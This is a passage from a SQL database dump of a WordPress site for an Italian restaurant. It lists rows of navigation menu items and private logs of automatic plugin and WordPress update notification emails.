19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2009,NULL,NULL,4162,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2010,NULL,NULL,4163,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2011,NULL,NULL,4164,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2012,NULL,NULL,4165,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2013,NULL,NULL,4166,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2014,NULL,NULL,4167,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2015,NULL,NULL,4168,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2633,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-45/','124:b45f481c564dd447ec00dedbe27d1e09',4660,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-20 01:17:08','2021-04-20 05:17:08',1,NULL,NULL,NULL,NULL,0,NULL),(2016,NULL,NULL,4169,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2017,NULL,NULL,4170,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2632,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-44/','124:75dbfac1aab79e4f7c2601f351fee0d8',4659,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-16 12:36:42','2021-04-16 16:36:42',1,NULL,NULL,NULL,NULL,0,NULL),(2018,NULL,NULL,4171,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2631,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-3/','112:17a9b2895bd2907c4cae073632638333',4658,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.3','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-16 02:34:22','2021-04-16 06:34:22',1,NULL,NULL,NULL,NULL,0,NULL),(2019,NULL,NULL,4172,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2630,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-43/','124:ccc3d37b6b02f7ea2859f89cccc6a4b4',4657,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-15 16:41:25','2021-04-15 20:41:25',1,NULL,NULL,NULL,NULL,0,NULL),(2020,NULL,NULL,4173,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2629,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-42/','124:42f8a1edaa6b0db5cf6ac4d174644ddb',4656,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-12 14:31:42','2021-04-12 18:31:42',1,NULL,NULL,NULL,NULL,0,NULL),(2021,NULL,NULL,4174,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2022,NULL,NULL,4175,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2628,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-41/','124:65dfba9203c4fc87665f0bcfefb035cc',4655,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-08 14:28:47','2021-04-08 18:28:47',1,NULL,NULL,NULL,NULL,0,NULL),(2023,NULL,NULL,4176,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2024,NULL,NULL,4177,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2627,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-40/','124:02a431c5cf6cbe5368b22d9123428a36',4654,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-07 00:34:50','2021-04-07 04:34:50',1,NULL,NULL,NULL,NULL,0,NULL),(2025,NULL,NULL,4178,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2026,NULL,NULL,4179,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2626,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-39/','124:7f0194b6ff7806b9d04c53128e4ad08f',4653,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-06 12:48:23','2021-04-06 16:48:23',1,NULL,NULL,NULL,NULL,0,NULL),(2027,NULL,NULL,4180,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2625,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-38/','124:beae4cf735f4b36cab362a41a11a08b5',4652,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-06 01:45:26','2021-04-06 05:45:26',1,NULL,NULL,NULL,NULL,0,NULL),(2028,NULL,NULL,4181,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2624,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-37/','124:3c53d9b6bc785298339d8c61ea7ad498',4651,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-04 02:34:46','2021-04-04 06:34:46',1,NULL,NULL,NULL,NULL,0,NULL),(2029,NULL,NULL,4182,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2623,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-36/','124:a5a5aae2342314a3bfac2eaa77c2550d',4650,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-04-02 00:44:47','2021-04-02 04:44:47',1,NULL,NULL,NULL,NULL,0,NULL),(2030,NULL,NULL,4183,'post','nav_menu_item',1,0,NULL,NULL,'Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2620,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-33/','124:efc85a2dcff78c4c393eeb241a9cce1e',4647,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-25 13:13:17','2021-03-25 17:13:17',1,NULL,NULL,NULL,NULL,0,NULL),(2031,NULL,NULL,4184,'post','nav_menu_item',1,0,NULL,NULL,'Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2619,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-32/','124:6de941a647de137751206410a3a93a15',4646,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-24 12:44:15','2021-03-24 16:44:15',1,NULL,NULL,NULL,NULL,0,NULL),(2032,NULL,NULL,4185,'post','nav_menu_item',1,0,NULL,NULL,'Link','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2033,NULL,NULL,4186,'post','nav_menu_item',1,0,NULL,NULL,'Quote','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2034,NULL,NULL,4187,'post','nav_menu_item',1,0,NULL,NULL,'Video','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2035,NULL,NULL,4188,'post','nav_menu_item',1,0,NULL,NULL,'Audio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2036,NULL,NULL,4189,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2037,NULL,NULL,4190,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2038,NULL,NULL,4191,'post','nav_menu_item',1,0,NULL,NULL,'Big Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2617,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-30/','124:dc23dc99ac06f2285839f1ed99aefa32',4644,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-22 12:44:19','2021-03-22 16:44:19',1,NULL,NULL,NULL,NULL,0,NULL),(2039,NULL,NULL,4192,'post','nav_menu_item',1,0,NULL,NULL,'Small Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2040,NULL,NULL,4193,'post','nav_menu_item',1,0,NULL,NULL,'Big Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2041,NULL,NULL,4194,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2042,NULL,NULL,4195,'post','nav_menu_item',1,0,NULL,NULL,'Big Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2043,NULL,NULL,4196,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2044,NULL,NULL,4197,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2045,NULL,NULL,4198,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2046,NULL,NULL,4199,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2616,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-29/','124:3de2c5f40f9dced6f87c6fbdc323f371',4643,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-20 00:32:08','2021-03-20 04:32:08',1,NULL,NULL,NULL,NULL,0,NULL),(2047,NULL,NULL,4200,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2048,NULL,NULL,4201,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2049,NULL,NULL,4202,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2050,NULL,NULL,4203,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2051,NULL,NULL,4204,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2052,NULL,NULL,4205,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2053,NULL,NULL,4206,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2615,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-28/','124:f89565872822aa0ef60906fadef9277d',4642,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-18 13:23:19','2021-03-18 17:23:19',1,NULL,NULL,NULL,NULL,0,NULL),(2054,NULL,NULL,4207,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2055,NULL,NULL,4208,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2056,NULL,NULL,4209,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2057,NULL,NULL,4210,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2058,NULL,NULL,4211,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 